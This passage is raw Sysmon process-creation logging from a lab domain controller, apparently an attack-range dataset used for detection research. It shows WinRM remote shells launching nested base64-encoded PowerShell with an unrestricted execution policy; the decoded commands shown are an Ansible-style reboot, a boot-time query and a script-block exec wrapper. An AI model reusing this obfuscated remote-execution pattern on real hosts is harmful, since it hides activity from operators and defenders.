UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAVQB3AEIAbABBAEgAUQBBAEwAUQBCAFQAQQBIAFEAQQBjAGcAQgBwAEEARwBNAEEAZABBAEIATgBBAEcAOABBAFoAQQBCAGwAQQBDAEEAQQBMAFEAQgBXAEEARwBVAEEAYwBnAEIAegBBAEcAawBBAGIAdwBCAHUAQQBDAEEAQQBUAEEAQgBoAEEASABRAEEAWgBRAEIAegBBAEgAUQBBAEMAZwBCAHoAQQBHAGcAQQBkAFEAQgAwAEEARwBRAEEAYgB3AEIAMwBBAEcANABBAEkAQQBBAHYAQQBIAEkAQQBJAEEAQQB2AEEASABRAEEASQBBAEEAeQBBAEMAQQBBAEwAdwBCAGoAQQBDAEEAQQBJAGcAQgBTAEEARwBVAEEAWQBnAEIAdgBBAEcAOABBAGQAQQBBAGcAQQBHAGsAQQBiAGcAQgBwAEEASABRAEEAYQBRAEIAaABBAEgAUQBBAFoAUQBCAGsAQQBDAEEAQQBZAGcAQgA1AEEAQwBBAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBpAEEAQQBvAEEAUwBRAEIAbQBBAEMAQQBBAEsAQQBBAHQAQQBHADQAQQBiAHcAQgAwAEEAQwBBAEEASgBBAEEALwBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBTAFEAQgBtAEEAQwBBAEEASwBBAEIASABBAEcAVQBBAGQAQQBBAHQAQQBGAFkAQQBZAFEAQgB5AEEARwBrAEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAGcAQQBFAHcAQQBRAFEAQgBUAEEARgBRAEEAUgBRAEIAWQBBAEUAawBBAFYAQQBCAEQAQQBFADgAQQBSAEEAQgBGAEEAQwBBAEEATABRAEIARgBBAEgASQBBAGMAZwBCAHYAQQBIAEkAQQBRAFEAQgBqAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEkAQQBCAFQAQQBHAGsAQQBiAEEAQgBsAEEARwA0AEEAZABBAEIAcwBBAEgAawBBAFEAdwBCAHYAQQBHADQAQQBkAEEAQgBwAEEARwA0AEEAZABRAEIAbABBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBaAFEAQgA0AEEARwBrAEEAZABBAEEAZwBBAEMAUQBBAFQAQQBCAEIAQQBGAE0AQQBWAEEAQgBGAEEARgBnAEEAUwBRAEIAVQBBAEUATQBBAFQAdwBCAEUAQQBFAFUAQQBJAEEAQgA5AEEAQwBBAEEAUgBRAEIAcwBBAEgAT
QBBAFoAUQBBAGcAQQBIAHMAQQBJAEEAQgBsAEEASABnAEEAYQBRAEIAMABBAEMAQQBBAE0AUQBBAGcAQQBIADAAQQBJAEEAQgA5AEEAQQA9AD0AC:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DC7-6078-813F-100000000000}0x103f810HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3DC7-6078-D802-00000000AD01}2956C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 154100x8000000000000000531Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:11.639{A8622C2F-3DC7-6078-DB02-00000000AD01}1164C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DC7-6078-813F-100000000000}0x103f810HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{A8622C2F-3DC7-6078-DA02-00000000AD01}4472C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA 154100x8000000000000000518Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:11.633{A8622C2F-3DC7-6078-DA02-00000000AD01}4472C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft 
CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DC7-6078-813F-100000000000}0x103f810HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3DC7-6078-D802-00000000AD01}2956C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 154100x8000000000000000499Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:11.564{A8622C2F-3DC7-6078-D802-00000000AD01}2956C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-3DC7-6078-813F-100000000000}0x103f810HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{A8622C2F-3C5A-6078-0C00-00000000AD01}8C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 154100x8000000000000000461Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:10.876{A8622C2F-3DC6-6078-D702-00000000AD01}3600C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESFB30.tmp" 
"c:\Users\Administrator\AppData\Local\Temp\CSCF2EE99019DAC4C81AE172E9818B04033.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DC5-6078-1B04-100000000000}0x10041b0HighMD5=C877CBB966EA5939AA2A17B6A5160950,SHA256=1FE531EAC592B480AA4BD16052B909C3431434F17E7AE163D248355558CE43A6,IMPHASH=55D76ADE7FFEA0F41FF2B55505C2B362{A8622C2F-3DC6-6078-D602-00000000AD01}732C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\cml1necr.cmdline" 154100x8000000000000000448Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:10.785{A8622C2F-3DC6-6078-D602-00000000AD01}732C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.8.3761.0 built by: NET48REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\cml1necr.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DC5-6078-1B04-100000000000}0x10041b0HighMD5=23EE3D381CFE3B9F6229483E2CE2F9E1,SHA256=4240A12E0B246C9D69AF1F697488FE7DA1B497DF20F4A6F95135B4D5FE180A57,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D{A8622C2F-3DC6-6078-D402-00000000AD01}3740C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 
JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 154100x8000000000000000429Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:10.327{A8622C2F-3DC6-6078-D502-00000000AD01}4280C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 65001C:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DC5-6078-1B04-100000000000}0x10041b0HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{A8622C2F-3DC6-6078-D402-00000000AD01}3740C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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 154100x8000000000000000409Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
13:21:10.183{A8622C2F-3DC6-6078-D402-00000000AD01}3740C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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C:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DC5-6078-1B04-100000000000}0x10041b0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{A8622C2F-3DC6-6078-D302-00000000AD01}4776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGM
AQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 154100x8000000000000000386Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:10.045{A8622C2F-3DC6-6078-D302-00000000AD01}4776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 
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C:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DC5-6078-1B04-100000000000}0x10041b0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{A8622C2F-3DC6-6078-D202-00000000AD01}4604C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQB
BAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 154100x8000000000000000373Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:10.039{A8622C2F-3DC6-6078-D202-00000000AD01}4604C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 
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C:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DC5-6078-1B04-100000000000}0x10041b0HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3DC5-6078-D002-00000000AD01}4284C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 154100x8000000000000000354Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:09.971{A8622C2F-3DC5-6078-D002-00000000AD01}4284C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-3DC5-6078-1B04-100000000000}0x10041b0HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{A8622C2F-3C5A-6078-0C00-00000000AD01}8C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 154100x8000000000000000314Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:09.249{A8622C2F-3DC5-6078-CF02-00000000AD01}4900C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESF4D7.tmp" 
"c:\Users\Administrator\AppData\Local\Temp\CSC387BF46D2D847B3BAA59F62799988C0.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DC4-6078-8EC8-0F0000000000}0xfc88e0HighMD5=C877CBB966EA5939AA2A17B6A5160950,SHA256=1FE531EAC592B480AA4BD16052B909C3431434F17E7AE163D248355558CE43A6,IMPHASH=55D76ADE7FFEA0F41FF2B55505C2B362{A8622C2F-3DC5-6078-CE02-00000000AD01}3964C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\qidwcgrf.cmdline" 154100x8000000000000000301Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:09.155{A8622C2F-3DC5-6078-CE02-00000000AD01}3964C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.8.3761.0 built by: NET48REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\qidwcgrf.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DC4-6078-8EC8-0F0000000000}0xfc88e0HighMD5=23EE3D381CFE3B9F6229483E2CE2F9E1,SHA256=4240A12E0B246C9D69AF1F697488FE7DA1B497DF20F4A6F95135B4D5FE180A57,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D{A8622C2F-3DC4-6078-CC02-00000000AD01}2180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 
